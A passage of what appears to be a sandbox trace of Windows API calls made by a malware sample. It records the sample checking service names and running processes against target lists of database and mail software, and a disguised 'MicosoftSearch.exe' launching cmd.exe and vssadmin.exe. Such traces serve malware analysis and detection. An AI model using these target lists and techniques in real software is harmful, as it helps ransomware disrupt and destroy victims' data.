lpString2="Spooler") returned -1 [0055.384] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0055.384] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0055.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0055.385] lstrlenW (lpString="swprv") returned 5 [0055.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0055.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0055.385] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0055.385] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0055.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0055.385] lstrlenW (lpString="SysMain") returned 7 [0055.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0055.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0055.385] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0055.385] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0055.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0055.385] lstrlenW (lpString="Themes") returned 6 [0055.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0055.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0055.385] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0055.385] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0055.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0055.385] lstrlenW (lpString="TrkWks") returned 6 [0055.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0055.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0055.385] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0055.385] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0055.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0055.385] lstrlenW (lpString="UxSms") returned 5 [0055.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0055.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0055.385] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0055.385] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0055.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0055.385] lstrlenW (lpString="VSS") returned 3 [0055.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0055.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0055.386] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0055.386] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0055.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0055.386] lstrlenW (lpString="WdiServiceHost") returned 14 [0055.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0055.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0055.386] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0055.386] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0055.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0055.386] lstrlenW (lpString="WdiSystemHost") returned 13 [0055.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0055.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0055.386] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0055.386] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0055.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0055.386] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0055.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0055.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0055.386] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0055.386] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0055.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0055.386] lstrlenW (lpString="Winmgmt") returned 7 [0055.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0055.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0055.386] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0055.386] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0055.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0055.386] lstrlenW (lpString="WPDBusEnum") returned 10 [0055.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0055.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0055.387] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0055.387] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0055.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0055.387] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc83f8 | out: hHeap=0xb10000) returned 1 [0055.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20c [0055.389] Process32FirstW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.390] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.391] lstrlenW (lpString="System") returned 6 [0055.391] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0055.391] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0055.391] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0055.391] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0055.391] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0055.391] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0055.391] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0055.391] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.392] lstrlenW (lpString="smss.exe") returned 8 [0055.392] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0055.392] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0055.392] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0055.392] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0055.392] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0055.392] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0055.392] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0055.392] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.393] lstrlenW (lpString="csrss.exe") returned 9 [0055.393] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0055.393] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0055.393] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0055.393] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0055.393] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0055.393] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0055.393] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0055.393] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.394] lstrlenW (lpString="wininit.exe") returned 11 [0055.394] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0055.394] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0055.394] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0055.394] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.395] lstrlenW (lpString="csrss.exe") returned 9 [0055.395] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.396] lstrlenW (lpString="winlogon.exe") returned 12 [0055.396] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.396] lstrlenW (lpString="services.exe") returned 12 [0055.396] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.397] lstrlenW (lpString="lsass.exe") returned 9 [0055.397] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0055.398] lstrlenW (lpString="lsm.exe") returned 7 [0055.398] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.399] lstrlenW (lpString="svchost.exe") returned 11 [0055.399] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.400] lstrlenW (lpString="svchost.exe") returned 11 [0055.400] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.400] lstrlenW (lpString="svchost.exe") returned 11 [0055.401] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.401] lstrlenW (lpString="svchost.exe") returned 11 [0055.401] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.402] lstrlenW (lpString="svchost.exe") returned 11 [0055.402] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0055.403] lstrlenW (lpString="audiodg.exe") returned 11 [0055.403] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.404] lstrlenW (lpString="svchost.exe") returned 11 [0055.404] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.404] lstrlenW (lpString="svchost.exe") returned 11 [0055.405] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0055.405] lstrlenW (lpString="dwm.exe") returned 7 [0055.405] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0055.406] lstrlenW (lpString="explorer.exe") returned 12 [0055.406] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0055.407] lstrlenW (lpString="spoolsv.exe") returned 11 [0055.407] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0055.408] lstrlenW (lpString="taskhost.exe") returned 12 [0055.408] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.409] lstrlenW (lpString="svchost.exe") returned 11 [0055.409] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0055.409] lstrlenW (lpString="taskeng.exe") returned 11 [0055.409] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0055.410] lstrlenW (lpString="taskhost.exe") returned 12 [0055.410] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0055.411] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0055.411] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0055.412] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0055.412] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0055.413] lstrlenW (lpString="sa_shape.exe") returned 12 [0055.413] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0055.749] lstrlenW (lpString="confidence.exe") returned 14 [0055.749] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0055.750] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0055.750] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0055.751] lstrlenW (lpString="blue.exe") returned 8 [0055.751] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0055.751] lstrlenW (lpString="newly debut.exe") returned 15 [0055.752] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0055.752] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0055.752] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0055.753] lstrlenW (lpString="archive.exe") returned 11 [0055.753] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0055.754] lstrlenW (lpString="defend.exe") returned 10 [0055.754] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0055.755] lstrlenW (lpString="arservice.exe") returned 13 [0055.755] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0055.755] lstrlenW (lpString="rr-programmer.exe") returned 17 [0055.756] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0055.757] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0055.757] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0055.757] lstrlenW (lpString="twistedmonton.exe") returned 17 [0055.757] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0055.758] lstrlenW (lpString="arc plains.exe") returned 14 [0055.758] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0055.759] lstrlenW (lpString="americahousestip.exe") returned 20 [0055.759] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0055.760] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0055.760] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0055.761] lstrlenW (lpString="medical lectures.exe") returned 20 [0055.761] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0055.762] lstrlenW (lpString="electronic.exe") returned 14 [0055.762] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0055.763] lstrlenW (lpString="regression.exe") returned 14 [0055.763] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0055.764] lstrlenW (lpString="county.exe") returned 10 [0055.765] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0055.766] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0055.766] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0055.767] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0055.767] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0055.768] lstrlenW (lpString="cmd.exe") returned 7 [0055.768] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0055.769] lstrlenW (lpString="conhost.exe") returned 11 [0055.769] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0055.770] lstrlenW (lpString="vssadmin.exe") returned 12 [0055.771] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, 